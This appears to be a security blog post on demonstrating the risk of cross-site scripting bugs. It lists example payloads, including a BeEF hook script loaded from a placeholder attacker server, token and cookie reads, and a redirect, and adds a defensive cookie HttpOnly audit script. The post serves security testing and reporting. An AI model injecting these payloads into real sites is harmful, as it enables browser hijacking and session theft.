Cross-Site Scripting (XSS) Exploitation

It's all very well using <script>alert(1);</script> to show the presence of a Cross-Site Scripting (XSS) vulnerability. However, illustrating the risk which the vulnerability poses is much more useful to those who need to prioritise and fix the issue, or, in the case of things such as bug bounties, decide how much to pay out for the finding.

The list below is meant to show several methods/payloads which can be used to highlight the risk which an XSS vulnerability can pose. This is by no means an exhaustive list.

BeEF Hook

This is my personal favourite! Using a BeEF (The Browser Exploitation Framework Project) hook simply opens up so many doors, and in my opinion is a great way to illustrate the risk which an XSS vulnerability can pose.

The hook is executed by running the JavaScript from the BeEF server, for example:
<script src="http://<IP>:3000/hook.js"></script>

Stealing Secrets from Local Storage

Many modern web applications now rely on session tokens which are stored on the client side. Most of these applications accomplish this by storing the token in the browser's local storage. An XSS on the web application could allow an attacker to obtain the token from the local storage for that site.

An example XSS script could be something like:
<script>alert('Session Token: ' + localStorage.getItem("session-token"));</script>

Stealing Cookies

This is similar to the exploit above, but instead of using local storage, cookies are used to store the session information. This is a more traditional approach to session management, where a session ID is stored in a cookie, and this refers to the session stored on the server. Using XSS, an attacker could potentially steal this ID.

However, there is a caveat to this. Cookies have a flag called the HttpOnly flag. If this flag is set on the cookie which stores the session ID, JavaScript is unable to interact with this cookie (thus rendering this exploit infeasible).

An example XSS script could be something like:
<script>alert(document.cookie);</script>
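
The HttpOnly caveat above can be checked from the server's responses. The following is an added example, not code from the original post: it parses Set-Cookie header values and lists the cookies that injected script could read through document.cookie. The sample headers and the SESSION_NAME heuristic are constructed assumptions.

```javascript
// Added example: audit Set-Cookie headers for cookies that page script can read.
// The header values below are constructed sample data, not from a real site.
const SAMPLE_SET_COOKIE = [
  "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
  "SESSION=def456; Path=/",
  "theme=dark; Path=/; Max-Age=31536000",
  "auth_token=ghi789; Path=/; secure; httponly",
];

// Hypothetical heuristic for "this cookie probably carries session state".
const SESSION_NAME = /sess|auth|token|sid/i;

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are case-insensitive, so they are lower-cased here.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";");
  const eq = pair.indexOf("=");
  if (eq < 1) return null; // nameless cookies are not handled in this example
  const attrs = new Map();
  for (const part of rest) {
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    const val = i === -1 ? "" : part.slice(i + 1).trim();
    if (key) attrs.set(key, val);
  }
  return { name: pair.slice(0, eq).trim(), value: pair.slice(eq + 1).trim(), attrs };
}

// Return one finding per cookie that lacks HttpOnly, i.e. is visible to
// document.cookie. Cookies whose name looks session-related are rated "high".
function auditCookies(headers) {
  const findings = [];
  for (const h of headers) {
    const c = parseSetCookie(h);
    if (!c || c.attrs.has("httponly")) continue;
    findings.push({
      name: c.name,
      severity: SESSION_NAME.test(c.name) ? "high" : "info",
      reason: "readable via document.cookie (no HttpOnly)",
    });
  }
  return findings;
}

console.log(auditCookies(SAMPLE_SET_COOKIE));
```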

Redirecting to a Malicious Site

Using XSS, an attacker could potentially redirect the victim to a site of their choosing. This could be, but is not limited to, a site which downloads and installs malware on the victim's system, or even a phishing site which attempts to trick the victim into supplying their login credentials to it.

An example XSS script could be something like:
<script>window.location.replace("https://example.com");</script>